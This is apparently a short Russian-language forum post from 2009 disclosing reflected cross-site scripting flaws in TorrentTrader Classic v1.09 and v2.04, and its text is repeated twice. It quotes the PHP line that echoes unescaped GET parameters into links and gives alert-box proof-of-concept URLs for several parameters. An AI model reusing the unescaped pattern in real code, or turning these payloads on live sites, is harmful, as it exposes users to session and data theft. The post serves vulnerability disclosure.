HAXTA4OK
12.08.2009, 17:31
Офф сайт = http://www.torrenttrader.org/
версия TorrentTrader Classic v1.09
XSS
получается из за не достаточной обработки данных
print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");
viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
viewrequests.php?category=&filter=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E&sort=votes
версия TorrentTrader Classic v2.04
XSS
torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
p.S по структуре файлов похож на TBDev
версия TorrentTrader Classic v1.09
XSS
получается из за не достаточной обработки данных
print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");
viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
viewrequests.php?category=&filter=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E&sort=votes
версия TorrentTrader Classic v2.04
XSS
torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
p.S по структуре файлов похож на TBDev